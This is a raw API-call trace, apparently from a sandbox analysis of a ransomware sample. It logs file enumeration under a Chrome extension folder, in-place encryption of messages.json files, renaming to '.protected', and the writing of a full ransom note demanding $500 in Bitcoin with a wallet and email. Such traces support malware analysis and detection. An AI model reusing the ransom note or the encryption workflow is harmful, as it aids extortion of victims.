Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json") returned 155 [0080.473] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json") returned 155 [0080.473] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.473] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb7, lpOverlapped=0x0) returned 1 [0080.474] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff49, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.474] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb7, lpOverlapped=0x0) returned 1 [0080.474] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.475] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.475] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.475] CloseHandle (hObject=0x168) returned 1 [0080.475] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.protected") returned 165 [0080.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.protected")) returned 1 [0080.476] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.476] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.476] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\RESTORE_FILES.txt") returned 159 [0080.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.476] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.476] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.477] lstrlenA (lpString="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") returned 684 [0080.477] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.477] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.477] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.477] CloseHandle (hObject=0x164) returned 1 [0080.477] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.477] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0080.477] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0080.477] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0080.477] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0080.477] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0080.477] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil") returned 142 [0080.478] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0080.478] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0080.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\*") returned 144 [0080.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.478] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.478] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.478] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.478] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.478] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\.") returned 144 [0080.478] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.478] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.478] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.478] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.478] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.478] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.478] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\..") returned 145 [0080.478] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.478] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.478] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.478] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.478] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.478] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.478] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.478] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json") returned 156 [0080.478] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.479] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.479] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.479] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json") returned 156 [0080.479] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json") returned 156 [0080.479] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json") returned 156 [0080.479] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.479] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc7, lpOverlapped=0x0) returned 1 [0080.480] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.480] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc7, lpOverlapped=0x0) returned 1 [0080.480] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.480] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.480] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.481] CloseHandle (hObject=0x168) returned 1 [0080.481] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.protected") returned 166 [0080.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.protected")) returned 1 [0080.481] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.481] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.481] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\RESTORE_FILES.txt") returned 160 [0080.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.482] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.482] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.483] lstrlenA (lpString="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") returned 684 [0080.484] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0080.484] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.484] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.484] CloseHandle (hObject=0x164) returned 1 [0080.484] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.484] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0080.484] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0080.484] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0080.484] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0080.484] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0080.484] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr") returned 141 [0080.484] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0080.484] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0080.484] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\*") returned 143 [0080.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.485] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0080.485] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.485] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.486] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.486] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\.") returned 143 [0080.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.486] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.486] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.486] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.486] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.486] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.486] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\..") returned 144 [0080.486] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.486] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.486] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.486] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.486] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.486] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0080.486] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.486] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json") returned 155 [0080.486] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.486] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.486] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.486] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json") returned 155 [0080.487] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json") returned 155 [0080.487] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json") returned 155 [0080.487] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.488] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.488] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.488] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xbb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.489] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.489] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.489] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.489] CloseHandle (hObject=0x168) returned 1 [0080.489] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
